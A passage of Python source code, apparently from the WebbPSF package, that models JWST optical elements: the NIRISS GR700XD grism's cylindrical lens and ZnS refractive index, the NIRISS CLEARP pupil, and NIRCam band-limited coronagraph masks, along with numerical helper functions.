prism-grism combo by 2 deg CCW, looking along the local +z axis, and the second rotation is for the mask by 3.05 deg but CW. As a result there is total 5.05 deg rotation between grism and its mask. See my annotations to your drawing attached. From Loic Albert's email to Marshall 2014-05-20: I should have pointed that the power assumed in my simulations for the cylindrical lens was off. It was one of the conclusions of CV1RR. The actual radius of curvature of the cylinder is 25.3 meters (rather than the smaller figure I used before). ORIENTATION: See Figure 2 of JWST-STScI-003338 In "DMS" coordinates, as projected looking outwards onto the sky, The GR700XD grating trace is near the extreme right edge of the detector with long wavelengths closest to (2048,2048) and short wavelengths nearest (2048,0) (The raw detector coordinates are very different from this due to a 180 degree rotation) **PLEASE NOTE** that the DMS when processing spectral data performs an additional transformation: For spectral data, the science X-axis is aligned with the detector dispersion direction and the science frame Y-axis is at a right angle to the X-axis in a right-handed coordinate system (Swade 2003) We choose here to ignore that complication; WebbPSF simulates the 2D sky projected image in "Sci" coordinates in the terminology for SIAF from Lallo et al. In this coordinate system, the dispersion from the cylinder lens is aligned almost along V2 and the longer wavelengths are oriented toward +V3. Parameters ---------- which : string 'initial' or 'spare'. Properties are hard coded. """ # # transmission : string filename # file for the pupil transmission function # cylinder_sag_mm : float # physical thickness of the cylindrical lens, in millimeters # rotation_angle : float # degrees clockwise for the orientation of the cylinder's dispersing axis. Default # of 92.25 should be consistent with initial NIRISS girsm and spare, except for # sign ambiguity. # rotate_mask : bool # should the field mask be rotated along with the cylinder? False for first gen initial # prism, true for expected spare replacement. 
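    # Illustrative usage sketch (hedged; not part of the formal API docs):
    #
    #     optic = NIRISS_GR700XD_Grism(which='Bach')   # the default flight grism
    #     optic.display(opd_vmax=6e-6)                 # default set in display() below
    #
    # Requesting which='LLNL' raises NotImplementedError, per __init__ below.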
def __init__(self, name='GR700XD', which='Bach', # cylinder_radius=22.85, cylinder_sag_mm=4.0, rotation_angle=92.25, rotate_mask=False, transmission=None, **kwargs): # Initialize the base optical element with the pupil transmission and zero OPD if which == 'LLNL': raise NotImplementedError("Rotated field mask for LLNL grism not yet implemented!") elif which == 'Bach': transmission = os.path.join(utils.get_webbpsf_data_path(), "NIRISS/optics/MASKGR700XD.fits.gz") else: raise NotImplementedError("Unknown grating name:" + which) poppy.AnalyticOpticalElement.__init__(self, name=name, planetype=poppy.poppy_core._PUPIL, **kwargs) # UPDATED NUMBERS 2013-07: # See Document FGS_TFI_UdM_035_RevD _log.debug("Computing properties for {0} grism".format(which)) if which == 'Bach': # ---- Phase properties --------------- # 3.994 microns P-V over 27.02 mm measured (Loic's email) # This is **surface sag**, corresponding to P-V of 6.311 waves at lambda=632.8 nm. # should correspond to 3.698 microns over 26 mm clear aperture. self.prism_size = 0.02702 # 27.02 millimeters for the physical prism self.prism_clear_aperture = 0.0260 # 26 mm clear aperture for the prism + mount self.cylinder_rotation_angle = 2 # was 2.25 # self.cylinder_radius = 22.85 # radius of curvature ; Nominal # but they discarded that and used 25.3 instead # From Lafreniere's wfe_cylindricallens.pro: # "OVERRIDE PREVIOUS CASES AFTER CV1RR RESULTS:" self.cylinder_radius = 25.3 # radius of curvature # ---- Amplitude Transmission / Pupil shape --------------- self.pupil_size_mm = 26.0 # Note that the IDL code says 26 mm is 683.75 pixels using the assumed demagnification self.pupil_rotation_angle = 2.0 else: # 5.8 microns P-V over 32.15 mm (Loic's email) # should correspond to 4.38 microns over 28 mm clear aperture self.cylinder_radius = 22.39 # radius of curvature self.prism_size = 0.03215 # millimeters for the physical prism self.prism_clear_aperture = 0.0280 # clear aperture for the prism + mount self.cylinder_rotation_angle = 2.25 # We need to know the magnification scale of the NIRISS reimaged pupil # in order to compute the curvature in the full-pupil units that POPPY uses # internally # pupil magnification computed from 22 mm clear aperture reported = # 857-169 pixels = 699 pixels in the 2D array which has scale =.00645604 # = 4.44175 meters projected on the primary # 2014-05-21 but wait, that's actually 26 mm! # so the 699 pixels at 0.00645604 m/pixel = 4.512 meters implies the magnificationa 173 not 170 # but, double wait, it's actually more like 687 pixels across rather than 699 so that makes it 170 again. # therefore the magnification is 0.1708 meters projected on the primary / mm in the NIRISS pupil # self.pupil_demagnification = 170.8367 # meters on the primary / meters in the NIRISS pupil # self.pupil_demagnification = 173.56 # meters on the primary / meters in the NIRISS pupil # Anand says: # nominally the circumscribing circle at the PW of NIRISS is ~40mm. I use 39mm for the nrm, but it's slightly field-dependent. Compare that to the 6.6... PM circle? self.pupil_demagnification = 6.6 / 0.040 # about 165 # perform an initial population of the OPD array for display etc. tmp = self.get_phasor(poppy.Wavefront(2e-6)) def get_opd(self, wave): """ Make an OPD array corresponding to the cylindrical weak lens used for defocusing the spectrum in the perpendicular-to-dispersion direction. 
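        As implemented below, the sag profile follows the circle equation
        sag(x) = sqrt(R**2 - (x / M)**2) - R, for cylinder radius of curvature R
        and pupil demagnification M; the OPD is then sag * (n - 1) using the
        ZnS index of refraction n at the requested wavelength.
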
        Parameters
        ----------
        wave : float or obj
            either a scalar wavelength (meters) or a Wavefront object

        """
        # wave should be a Wavefront object
        # wavelength is an astropy.units type
        if isinstance(wave, poppy.Wavefront):
            wavelength = wave.wavelength
        else:
            wave = poppy.Wavefront(wavelength=float(wave))
            wavelength = wave.wavelength

        # compute indices in pixels, relative to center of plane, with rotation
        # units of these are meters
        y, x = wave.coordinates()
        ang = np.deg2rad(self.cylinder_rotation_angle)
        # rotate the coordinates simultaneously, so the second component is
        # computed from the original x rather than the already-rotated one
        x, y = (np.cos(ang) * x - np.sin(ang) * y,
                np.sin(ang) * x + np.cos(ang) * y)
        _log.debug(" Rotating local grism axes by {0} degrees".format(self.cylinder_rotation_angle))

        # From IDL code by David Lafreniere:
        # ;the cylindrical defocus
        # x=(dindgen(pupdim)-pupdim/2)#replicate(1,pupdim)
        # y0=(rpuppix^2+sag[s]^2)/(2*sag[s])
        # wfe1=y0-sqrt(y0^2-x^2)
        # if sag[s] lt 1.e-5 then wfe1=0.d0

        # Here I will just translate that to Python exactly, making use of the
        # variables here:

        # rpuppix = radius of pupil in pixels
        # rpuppix = self.amplitude_header['DIAM'] / self.amplitude_header['PUPLSCAL'] / 2
        # Calculate the radius of curvature of the cylinder, based on
        # the chord length and height

        # In this case we're assuming the cylinder is precisely as wide as the projected
        # telescope pupil. This doesn't seem guaranteed:
        #  * actual chord length across cylinder: 27.02 mm.
        #  * projected primary scale at NIRISS = ?

        _log.debug(" Computing GR700XD cylinder based on RoC: {0:.3g} meters".format(self.cylinder_radius))
        _log.debug(" Computing GR700XD cylinder based on pupil demagnification: {0:.3g} primary to grism".format(
            self.pupil_demagnification))

        # Compute the overall sag of the cylinder lens at its outer edge. This is not actually used, it's
        # just for cross-check of the values
        # the sag will depend on half the pupil size since that's the offset from center to edge
        sag0 = np.sqrt(self.cylinder_radius ** 2 - (self.prism_size / 2) ** 2) - self.cylinder_radius
        _log.debug(" Computed GR700XD cylinder sag at lens outer edge (for cross check only): {0:.3g} meters".format(sag0))

        # now compute the spatially dependent sag of the cylinder, as projected onto the primary

        # what is the pupil scale at the *reimaged pupil* of the grism?
        pupil_scale_m_per_pix = 38.0255e-6  # Based on UdeM info in wfe_cylindricallens.pro
        # sag = np.sqrt(self.cylinder_radius**2 - (x*self.amplitude_header['PUPLSCAL']/self.pupil_demagnification)**2) - self.cylinder_radius
        sag = np.sqrt(self.cylinder_radius ** 2 - (x / self.pupil_demagnification) ** 2) - self.cylinder_radius
        # sag = self.cylinder_radius - np.sqrt(self.cylinder_radius**2 - (x * pupil_scale_m_per_pix )**2 )

        # what we really want to do is take the physical properties of the as-built optic, and interpolate into that
        # to compute the OPD after remapping based on the pupil scale (and distortion?)
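        # Numeric cross-check (hedged; illustrative arithmetic only): for the
        # nominal values quoted in the class docstring, R = 22.85 m and a 26 mm
        # clear aperture give an edge sag of roughly
        #     0.013**2 / (2 * 22.85) ~= 3.70e-6 m,
        # consistent with the 3.698 micron figure from Loic Albert's report.
        # With the post-CV1RR radius of 25.3 m adopted above, the same chord
        # gives ~= 3.34e-6 m.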
        # y0=(rpuppix**2+self.cylinder_sag**2)/(2*self.cylinder_sag)
        # wfe1=y0-np.sqrt(y0**2-x**2)

        _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across full array".format(sag.max() - sag.min()))

        # no OPD in opaque regions (makes no difference in propagation but improves display)
        if not hasattr(self, '_transmission') or self._transmission.shape != sag.shape:
            self.get_transmission(wave)  # Update the ._transmission attribute
        sag[self._transmission == 0] = 0
        wnz = np.where(self._transmission != 0)  # use this just for display of the log messages:
        _log.debug(" Cylinder P-V: {0:.4g} meters physical sag across clear aperture".format(
            sag[wnz].max() - sag[wnz].min()))

        # scale for index of refraction
        index = self.ZnS_index(wavelength)
        opd = sag * (index - 1)
        lambda_micron = wavelength.to(units.micron).value
        _log.debug(" Scaling for ZnS index of refraction {0} at {1:.3g} microns".format(index, lambda_micron))
        _log.debug(" Cylinder P-V: {0:.4g} meters optical sag at {1:.3g} microns across clear aperture".format(
            opd[wnz].max() - opd[wnz].min(), lambda_micron))
        return opd

    def get_transmission(self, wave):
        """ Make array for the pupil obscuration appropriate to the grism
        """
        if isinstance(wave, poppy.Wavefront):
            wavelength = wave.wavelength
        else:
            wave = poppy.Wavefront(wavelength=float(wave))
            wavelength = wave.wavelength

        y, x = wave.coordinates()
        ang = np.deg2rad(self.pupil_rotation_angle)
        # rotate simultaneously, so y is computed from the original x
        x, y = (np.cos(ang) * x - np.sin(ang) * y,
                np.sin(ang) * x + np.cos(ang) * y)
        _log.debug("Rotating local pupil mask axes by {0} degrees".format(self.pupil_rotation_angle))

        pupil_halfsize_m = self.pupil_size_mm / 2 / 1000 * self.pupil_demagnification
        pupilmask = np.ones_like(x)
        pupilmask[np.abs(x) > pupil_halfsize_m] = 0
        pupilmask[np.abs(y) > pupil_halfsize_m] = 0

        self._transmission = pupilmask
        return pupilmask

    @poppy.utils.quantity_input(wavelength=units.meter)
    def ZnS_index(self, wavelength, temperature=40):
        """ Return cryogenic index of refraction of ZnS (Cleartran)

        Based on IDL function index_cleartran provided by Loic Albert at U de Montreal
        Which was in turn based on Leviton and Fray 2013
        http://proceedings.spiedigitallibrary.org/proceeding.aspx?articleid=1744938
        doi:10.1117/12.2024817
        """
        lambda_micron = wavelength.to(units.micron).value

        # Sellmeier dispersion model
        # From Leviton & Frey measurements (SPIE preprint) (assumes lambda in microns)
        S_1 = np.asarray([[3.35933, -5.12262e-4, 1.01086e-5, -4.14798e-8, 6.91051e-11]])
        S_2 = np.asarray([[0.706131, 4.89603e-4, -8.91159e-6, 3.81621e-8, -6.54805e-11]])
        S_3 = np.asarray([[4.02154, -2.93193e-2, 2.31080e-4, -7.57289e-07, 8.31188e-10]])
        S_ij = np.concatenate((S_1, S_2, S_3), axis=0)

        lambda_1 = np.array([[0.161151, -8.93057E-06, 2.73286E-07, -1.23408E-09, 2.29917E-12]])
        lambda_2 = np.array([[0.282427, -4.66636E-05, 7.55906E-07, -2.77513E-09, 4.35237E-12]])
        lambda_3 = np.array([[41.1590, -0.161010, 1.23906E-03, -3.95895E-06, 4.16370E-09]])
        lambda_ij = np.concatenate((lambda_1, lambda_2, lambda_3))

        n2minus1 = 0.0
        T = temperature
        for i in range(3):
            S_i = S_ij[i, 0] + S_ij[i, 1] * T + S_ij[i, 2] * T ** 2.0 + S_ij[i, 3] * T ** 3.0 + S_ij[i, 4] * T ** 4.0
            lambda_i = (lambda_ij[i, 0] + lambda_ij[i, 1] * T + lambda_ij[i, 2] * T ** 2.0
                        + lambda_ij[i, 3] * T ** 3.0 + lambda_ij[i, 4] * T ** 4.0)
            n2minus1 += S_i * lambda_micron ** 2.0 / (lambda_micron ** 2.0 - lambda_i ** 2.0)

        cleartran_index = np.sqrt(1.0 + n2minus1)
        return cleartran_index

    def display(self, opd_vmax=6e-6, *args, **kwargs):
        "Same as regular display for any other optical element, except opd_vmax default changed"
        poppy.AnalyticOpticalElement.display(self, *args, opd_vmax=opd_vmax, **kwargs)


class NIRISS_CLEARP(poppy.CompoundAnalyticOptic):
    """NIRISS 'CLEARP' pupil, including PAR obscuration

    **CAUTIONARY NOTE** TODO: This class represents this optic as having a circular outer edge;
    in reality the hardware has a 4% oversized tricontagon mask around the JWST pupil image.
    However as the primary mirror should serve as the pupil stop, in practice this model
    simplification should not affect output PSFs in imaging modes. This simplification may be
    removed in a future version of WebbPSF. See https://github.com/mperrin/webbpsf/issues/71

    CLEARP pupil info from:
       MODIFIED CALIBRATION OPTIC HOLDER - NIRISS
       DRAWING NO 196847  REV 0  COMDEV
       Design file name 196847Rev0.pdf sent by Loic Albert

    Properties:
      39 mm outer diam, corresponds to the circumscribing pupil of JWST
      2.0 mm vane width
      6.0 mm radius for central obstruction

    Note the circumscribing pupil of JWST is 6603.464 mm in diameter
    (Ball SER on geometric optics model: BALL-JWST-SYST-05-003)
    and therefore the NIRISS pupil magnification is 6.603464/39.0 = 0.1693 meters
    (JWST primary) per mm (NIRISS internal pupil)

    Pupil distortions are not included in this model.
    """

    def __init__(self, *args, **kwargs):
        # CLEARP pupil info from:
        #   MODIFIED CALIBRATION OPTIC HOLDER - NIRISS
        #   DRAWING NO 196847  REV 0  COMDEV
        #   Design file name 196847Rev0.pdf sent by Loic Albert
        # Properties:
        #  39 mm outer diam, corresponds to the circumscribing pupil of JWST
        #  2.0 mm vane width
        #  6.0 mm radius for central obstruction
        # Note the circumscribing pupil of JWST is 6603.464 mm in diameter
        #  (Ball SER on geometric optics model: BALL-JWST-SYST-05-003)
        pupil_mag = 6.603464 / 39.0
        poppy.CompoundAnalyticOptic.__init__(self, (
            poppy.SecondaryObscuration(secondary_radius=6.0 * pupil_mag,
                                       support_width=2.0 * pupil_mag,
                                       n_supports=3,
                                       support_angle_offset=90 + 180,  # align first support with +V2 axis
                                                                       # but invert to match OTE exit pupil
                                       *args, **kwargs),
            poppy.CircularAperture(radius=39 * pupil_mag / 2, *args, **kwargs)),
            name='CLEARP')


class NIRCam_BandLimitedCoron(poppy.BandLimitedCoron):
    """ Band Limited Coronagraph

    Parameters
    ----------
    name : string
        Descriptive name. Must be one of the defined NIRCam coronagraphic mask names.
    module : string
        A or B
    nd_squares : bool
        Include the ND squares in the mask simulation? (Not an option in the real instrument;
        solely for certain simulation checks.)
    bar_offset : float
        Offset along coronagraphic bar (wedge) occulter, in arcseconds.
        Used for computing a PSF at a different position along the wedge, while
        keeping the convention that the target star has zero tip/tilt.
        This option is used to MANUALLY specify a specific position along the bar;
        see also the following option auto_offset.
    auto_offset : string or None
        Set to a NIRCam filter name to automatically offset to the nominal
        position along the bar for that filter. See bar_offset if you want to set
        to some arbitrary position.
    shift_x, shift_y : floats or None
        X and Y offset shifts applied to the occulter, via the standard mechanism for
        poppy.AnalyticOpticalElements. Like bar_offset but allows for 2D offsets, and
        applies to both bar and wedge coronagraphs. This is IN ADDITION TO any offset
        from bar_offset.
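    Examples
    --------
    A hedged usage sketch (mask and filter names as defined in this class;
    the exact offset values come from pySIAF lookups in __init__ below):

        blc = NIRCam_BandLimitedCoron(name='MASKLWB', module='A',
                                      auto_offset='F335M')

    This selects the LW wedge occulter and applies the nominal bar offset
    for filter F335M.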
""" allowable_kinds = ['nircamcircular', 'nircamwedge'] """ Allowable types of BLC supported by this class""" def __init__(self, name="unnamed BLC", kind='nircamcircular', module='A', nd_squares=True, bar_offset=None, auto_offset=None, **kwargs): super(NIRCam_BandLimitedCoron, self).__init__(name=name, kind=kind, **kwargs) if module not in ['A', 'B']: raise ValueError("module parameter must be 'A' or 'B'.") self.module = module self.nd_squares = nd_squares if self.name == 'MASK210R': self.sigma = 5.253 self.kind = 'nircamcircular' elif self.name == 'MASK335R': self.sigma = 3.2927866 self.kind = 'nircamcircular' elif self.name == 'MASK430R': self.sigma = 2.58832 self.kind = 'nircamcircular' elif self.name == 'MASKSWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor elif self.name == 'MASKLWB': self.kind = 'nircamwedge' # coeffs set in lookup table inside getPhasor else: raise NotImplementedError("invalid name for NIRCam occulter: " + self.name) # EDIT: updated on 8 Dec 2021 to grab offsets directly from pySIAF self.siaf = pysiaf.Siaf('NIRCAM') self.offset_swb = {filt: self.get_bar_offset_from_siaf(filt, channel='SW') for filt in ["F182M", "F187N", "F210M", "F212N", "F200W", 'narrow']} self.offset_lwb = {filt: self.get_bar_offset_from_siaf(filt, channel='LW') for filt in ["F250M", "F300M", "F277W", "F335M", "F360M", "F356W", "F410M", "F430M", "F460M", "F480M", "F444W", 'narrow']} if bar_offset is None and auto_offset is not None: offsets = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb try: bar_offset = offsets[auto_offset] _log.debug("Set bar offset to {} based on requested filter {} on {}.".format(bar_offset, auto_offset, self.name)) except: raise ValueError("Filter {} does not have a defined nominal offset position along {}".format(auto_offset, self.name)) if bar_offset is not None: if self.kind == 'nircamcircular': raise ValueError("bar_offset option only makes sense with the bar occulters.") self.bar_offset = float(bar_offset) _log.debug("Set offset along {} to {} arcsec.".format(self.name, self.bar_offset)) else: self.bar_offset = None def get_bar_offset_from_siaf(self, filt, channel='LW'): """ Get bar offset directly from SIAF. """ if channel == 'SW': refapername = 'NRCA4_MASKSWB' apername = 'NRCA4_MASKSWB_' + filt.upper() else: # otherwise default to LW refapername = 'NRCA5_MASKLWB' apername = 'NRCA5_MASKLWB_' + filt.upper() offset_arcsec = np.sqrt((self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref)**2 + (self.siaf.apertures[refapername].V3Ref - self.siaf.apertures[apername].V3Ref)**2) sign = np.sign(self.siaf.apertures[refapername].V2Ref - self.siaf.apertures[apername].V2Ref) return sign * offset_arcsec def get_transmission(self, wave): """ Compute the amplitude transmission appropriate for a BLC for some given pixel spacing corresponding to the supplied Wavefront. Based on the Krist et al. SPIE paper on NIRCam coronagraph design Note that the equations in Krist et al specify the intensity transmission of the occulter, but what we want to return here is the amplitude transmittance. That is the square root of the intensity, of course, so the equations as implemented here all differ from those written in Krist's SPIE paper by lacking an exponential factor of 2. Thanks to John Krist for pointing this out. 
""" import scipy.special if not isinstance(wave, poppy.Wavefront): # pragma: no cover raise ValueError("BLC getPhasor must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = self.get_coordinates(wave) if self.bar_offset is not None: x += float(self.bar_offset) if self.kind == 'nircamcircular': r = poppy.accel_math._r(x, y) sigmar = self.sigma * r # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware bessel_j1_zero2 = scipy.special.jn_zeros(1, 2)[1] sigmar.clip(np.finfo(sigmar.dtype).tiny, bessel_j1_zero2, out=sigmar) # avoid divide by zero -> NaNs if poppy.accel_math._USE_NUMEXPR: import numexpr as ne jn1 = scipy.special.j1(sigmar) self.transmission = ne.evaluate("(1 - (2 * jn1 / sigmar) ** 2)") else: self.transmission = (1 - (2 * scipy.special.j1(sigmar) / sigmar) ** 2) self.transmission[r == 0] = 0 # special case center point (value based on L'Hopital's rule) elif self.kind == 'nircamwedge': # This is hard-coded to the wedge-plus-flat-regions shape for NIRCAM # the scale fact should depend on X coord in arcsec, scaling across a 20 arcsec FOV. # map flat regions to 2.5 arcsec each # map -7.5 to 2, +7.5 to 6. slope is 4/15, offset is +9.5 wedgesign = 1 if self.name == 'MASKSWB' else -1 # wide ends opposite for SW and LW scalefact = (2 + (x * wedgesign + 7.5) * 4 / 15).clip(2, 6) # Working out the sigma parameter vs. wavelength to get that wedge pattern is non trivial # This is NOT a linear relationship. See calc_blc_wedge helper fn below. if self.name == 'MASKSWB': # np.abs(self.wavelength - 2.1e-6) < 0.1e-6: polyfitcoeffs = np.array([2.01210737e-04, -7.18758337e-03, 1.12381516e-01, -1.00877701e+00, 5.72538509e+00, -2.12943497e+01, 5.18745152e+01, -7.97815606e+01, 7.02728734e+01]) elif self.name == 'MASKLWB': # elif np.abs(self.wavelength - 4.6e-6) < 0.1e-6: polyfitcoeffs = np.array([9.16195583e-05, -3.27354831e-03, 5.11960734e-02, -4.59674047e-01, 2.60963397e+00, -9.70881273e+00, 2.36585911e+01, -3.63978587e+01, 3.20703511e+01]) else: raise NotImplementedError("invalid name for NIRCam wedge occulter") sigmas = scipy.poly1d(polyfitcoeffs)(scalefact) sigmar = sigmas * np.abs(y) # clip sigma: The minimum is to avoid divide by zero # the maximum truncates after the first sidelobe to match the hardware sigmar.clip(min=np.finfo(sigmar.dtype).tiny, max=2 * np.pi, out=sigmar) self.transmission = (1 - (np.sin(sigmar) / sigmar) ** 2) self.transmission[y == 0] = 0 # special case center point (value based on L'Hopital's rule) # the bar should truncate at +- 10 arcsec: woutside = np.where(np.abs(x) > 10) self.transmission[woutside] = 1.0 if self.nd_squares: # add in the ND squares. Note the positions are not exactly the same in the two wedges. # See the figures in Krist et al. 
            # of how the 6 ND squares are spaced among the 5 coronagraph regions.
            # Note: 180 deg rotation needed relative to Krist's figures for the flight SCI orientation:
            if ((self.module == 'A' and self.name == 'MASKLWB') or
                    (self.module == 'B' and self.name == 'MASK210R')):
                # left edge:
                # has one fully in the corner and one half in the other corner, half outside the 10x10 box
                wnd_5 = np.where(
                    ((y < -5) & (y > -10)) &
                    (
                        ((x > 5) & (x < 10)) |
                        ((x < -7.5) & (x > -12.5))
                    )
                )
                wnd_2 = np.where(
                    ((y < 10) & (y > 8)) &
                    (
                        ((x > 8) & (x < 10)) |
                        ((x < -9) & (x > -11))
                    )
                )
            elif ((self.module == 'A' and self.name == 'MASK210R') or
                    (self.module == 'B' and self.name == 'MASKSWB')):
                # right edge
                wnd_5 = np.where(
                    ((y < -5) & (y > -10)) &
                    (
                        ((x < 12.5) & (x > 7.5)) |
                        ((x < -5) & (x > -10))
                    )
                )
                wnd_2 = np.where(
                    ((y < 10) & (y > 8)) &
                    (
                        ((x < 11) & (x > 9)) |
                        ((x < -8) & (x > -10))
                    )
                )
            else:
                # the others have two, one in each corner, both halfway out of the 10x10 box.
                wnd_5 = np.where(
                    ((y < -5) & (y > -10)) &
                    (np.abs(x) > 7.5) &
                    (np.abs(x) < 12.5)
                )
                wnd_2 = np.where(
                    ((y < 10) & (y > 8)) &
                    (np.abs(x) > 9) &
                    (np.abs(x) < 11)
                )

            self.transmission[wnd_5] = np.sqrt(1e-3)
            self.transmission[wnd_2] = np.sqrt(1e-3)

            # Add in the opaque border of the coronagraph mask holder.
            if ((self.module == 'A' and self.name == 'MASKLWB') or
                    (self.module == 'B' and self.name == 'MASK210R')):
                # left edge
                woutside = np.where((x > 10) & (y > -11.5))
                self.transmission[woutside] = 0.0
            elif ((self.module == 'A' and self.name == 'MASK210R') or
                    (self.module == 'B' and self.name == 'MASKSWB')):
                # right edge
                woutside = np.where((x < -10) & (y > -11.5))
                self.transmission[woutside] = 0.0
            # mask holder edge
            woutside = np.where(y > 10)
            self.transmission[woutside] = 0.0

            # edge of mask itself
            # TODO the mask edge is complex and partially opaque based on CV3 images?
            # edge of glass plate rather than opaque mask I believe. To do later.
            # The following is just a temporary placeholder with no quantitative accuracy.
            # but this is outside the coronagraph FOV so that's fine - this only would matter in
            # modeling atypical/nonstandard calibration exposures.
            wedge = np.where((y < -11.5) & (y > -13))
            self.transmission[wedge] = 0.7

        if not np.isfinite(self.transmission.sum()):
            _log.warning("There are NaNs in the BLC mask - correcting to zero. (DEBUG LATER?)")
            self.transmission[~np.isfinite(self.transmission)] = 0
        return self.transmission

    def display(self, annotate=False, annotate_color='cyan', annotate_text_color=None, grid_size=20, *args, **kwargs):
        """Same as regular display for any other optical element, except adds annotate option
        for the LWB offsets
        """
        poppy.AnalyticOpticalElement.display(self, grid_size=grid_size, *args, **kwargs)
        if annotate:
            shift_dx = getattr(self, 'shift_x', 0) - getattr(self, 'bar_offset', 0)
            shift_dy = getattr(self, 'shift_y', 0)
            if annotate_text_color is None:
                annotate_text_color = annotate_color
            if self.name.lower() == 'maskswb' or self.name.lower() == 'masklwb':
                # use a distinct name for the dict so the loop variable doesn't shadow it
                offsets = self.offset_swb if self.name.lower() == 'maskswb' else self.offset_lwb
                for filt, offset in offsets.items():
                    if 'W' in filt:
                        horiz, vert, voffset = 'right', 'top', -0.5
                    else:
                        horiz, vert, voffset = 'left', 'bottom', +0.5
                    matplotlib.pyplot.plot(offset + shift_dx, shift_dy, marker='+', color=annotate_color,
                                           clip_on=True)
                    matplotlib.pyplot.text(offset + shift_dx, voffset + shift_dy, filt, color=annotate_text_color,
                                           rotation=75, horizontalalignment=horiz, verticalalignment=vert,
                                           clip_on=True)
            ax = matplotlib.pyplot.gca()
            # Fix the axis scaling if any of the overplots exceeded it
            ax.set_xlim(-grid_size / 2, grid_size / 2)
            ax.set_ylim(-grid_size / 2, grid_size / 2)


# Helper functions for NIRCam occulters.
# The following are no longer used in practice, but were used to derive the
# table of polynomial coefficients that is now hard-coded inside
# the NIRCam_BandLimitedCoron case for the nircam wedge occulters.


def _width_blc(desired_width, approx=None, plot=False):
    """ The calculation of sigma parameters for the wedge BLC function is not straightforward.

    This function numerically solves the relevant equation to determine the sigma required
    to achieve a given HWHM.

    It uses recursion to iterate to a higher precision level.
    """
    loc = desired_width

    if approx is None:
        sigma = np.linspace(0, 20, 5000)
    else:
        sigma = np.linspace(approx * 0.9, approx * 1.1, 100000)  # sample count must be an integer
    lhs = loc * np.sqrt(1 - np.sqrt(0.5))
    rhs = np.sin(sigma * loc) / sigma
    diff = np.abs(lhs - rhs)
    wmin = np.where(diff == np.nanmin(diff))
    sig_ans = sigma[wmin][0]

    if approx:
        return sig_ans
    else:
        # use recursion
        sig_ans = _width_blc(loc, sig_ans)

    if plot:
        check = (1 - (np.sin(sig_ans * loc) / sig_ans / loc) ** 2) ** 2
        # plt.plot(sigma, lhs)
        plt.clf()
        plt.plot(sigma, rhs)
        plt.axhline(lhs)
        print("sigma = %f implies HWHM = %f" % (sig_ans, loc))
        print(" check: 0.5 == %f" % (check))
    return sig_ans


def _calc_blc_wedge(deg=4, wavelength=2.1e-6):
    """ This function determines the desired sigma coefficients required to
    achieve a wedge from 2 to 6 lam/D.

    It returns the coefficients of a polynomial fit that maps from
    nlambda/D to sigma.
    """
    r = np.linspace(2, 6, 161)
    difflim = wavelength / 6.5 * 180. * 60 * 60 / np.pi
    sigs = [_width_blc(difflim * ri) for ri in r]

    # np.polyfit / np.poly1d here; the former scipy aliases were removed from modern scipy
    pcs = np.polyfit(r, sigs, deg)
    p = np.poly1d(pcs)
    plt.plot(r, sigs, 'b')
    plt.plot(r, p(r), "r--")
    diffs = (sigs - p(r))
    print("Poly fit:" + repr(pcs))
    print(" fit rms: " + str(diffs.std()))


def _trim_nan_image(xgrid, ygrid, zgrid):
    """NaN Trimming of Image

    Remove rows/cols with NaN's while trying to preserve
    the maximum footprint of real data.
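    A hedged toy example (values illustrative only): an array whose border
    rows/columns are entirely NaN is cropped down to its finite core:

        z = np.full((5, 5), np.nan)
        z[1:4, 1:4] = 1.0
        x = y = np.arange(5)
        x2, y2, z2 = _trim_nan_image(x, y, z)   # z2.shape == (3, 3)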
""" xgrid2, ygrid2, zgrid2 = xgrid, ygrid, zgrid # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # First, crop all rows/cols that are only NaN's xind_good = np.where(num_nans_cols < nrows)[0] yind_good = np.where(num_nans_rows < ncols)[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Find a optimal rectangule subsection free of NaN's # Iterative cropping ndiff = 5 while np.isnan(zgrid2.sum()): # Make sure ndiff is not negative if ndiff<0: break npix = zgrid2.size # Create a mask of NaN'ed values nan_mask = np.isnan(zgrid2) nrows, ncols = nan_mask.shape # Determine number of NaN's along each row and col num_nans_cols = nan_mask.sum(axis=0) num_nans_rows = nan_mask.sum(axis=1) # Look for any appreciable diff row-to-row/col-to-col col_diff = num_nans_cols - np.roll(num_nans_cols,-1) row_diff = num_nans_rows - np.roll(num_nans_rows,-1) # For edge wrapping, just use last minus previous col_diff[-1] = col_diff[-2] row_diff[-1] = row_diff[-2] # Keep rows/cols composed mostly of real data # and where number of NaN's don't change dramatically xind_good = np.where( ( np.abs(col_diff) <= ndiff ) & ( num_nans_cols < 0.5*nrows ) )[0] yind_good = np.where( ( np.abs(row_diff) <= ndiff ) & ( num_nans_rows < 0.5*ncols ) )[0] # get border limits x1, x2 = (xind_good.min(), xind_good.max()+1) y1, y2 = (yind_good.min(), yind_good.max()+1) # Trim of NaN borders xgrid2 = xgrid2[x1:x2] ygrid2 = ygrid2[y1:y2] zgrid2 = zgrid2[y1:y2,x1:x2] # Check for convergence # If we've converged, reduce if npix==zgrid2.size: ndiff -= 1 # Last ditch effort in case there are still NaNs # If so, remove rows/cols 1 by 1 until no NaNs while np.isnan(zgrid2.sum()): xgrid2 = xgrid2[1:-1] ygrid2 = ygrid2[1:-1] zgrid2 = zgrid2[1:-1,1:-1] return xgrid2, ygrid2, zgrid2 def _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=0): """Fix NaN's in Zernike Grid We trim NaN's within `zgrid`, then generate an extrapolation function using `RegularGridInterpolator`. A rotation angle can also be specified to maximize the number of remaining data points due to irregular polygons of the real `zgrid` data. Returns `zgrid` with the NaN's fixed using the extrapolation function. Parameter ========= xgrid : ndarray 1D V2 regular grid information ygrid : ndarray 1D V3 regular grid information zgrid : ndarray 2D Zernike grid rot_ang : float Option to rotate grid data for more optimal trimming of NaN's. 
